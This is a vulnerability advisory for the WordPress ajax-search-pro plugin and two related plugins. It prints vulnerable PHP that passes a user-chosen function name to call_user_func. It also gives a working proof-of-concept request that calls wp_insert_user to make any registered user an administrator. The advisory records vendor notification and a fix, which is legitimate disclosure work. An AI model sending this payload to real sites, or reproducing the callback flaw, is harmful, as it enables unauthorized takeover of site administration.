------------------------------------------------------------------------------
WordPress ajax-search-pro Plugin Remote Code Execution
------------------------------------------------------------------------------

[-] Plugin Link:

http://codecanyon.net/item/ajax-search-pro-for-wordpress-live-search-plugin/3357410

also affected:
    https://wordpress.org/plugins/ajax-search-lite/
    https://wordpress.org/plugins/related-posts-lite/

[-] Vulnerability Description:

This vulnerability allows any registered user to execute arbitrary functions
vulnerability code:

add_action('wp_ajax_wpdreams-ajaxinput', "wpdreams_ajaxinputcallback");
if (!function_exists("wpdreams_ajaxinputcallback")) {
    function wpdreams_ajaxinputcallback() {
        $param = $_POST;
        echo call_user_func($_POST['wpdreams_callback'], $param);
        exit;
    }
}

this will allow any registered user to execute any function he wants with
1st param set to array($_POST)
since wordpress core provides some functions that accept 1st param as an
array then,
wp_insert_user have a role option for the user you are inserting, this
option can insert a new administrator

[-] Proof of Concept:

this will register an administrator with username "xADMIN" and password
"xPASS"

url:
http://localhost/x/wordpress/wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput
post data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator

[-] Fix:

Updated to the latest version.

[-] Timeline:

09 March - Vendor Notified
09 March - Fix Released
18 March - Public Disclosure

[-] Refernces:
http://research.evex.pw/?vuln=9 <http://research.evex.pw/?vuln=8>

@Evex_1337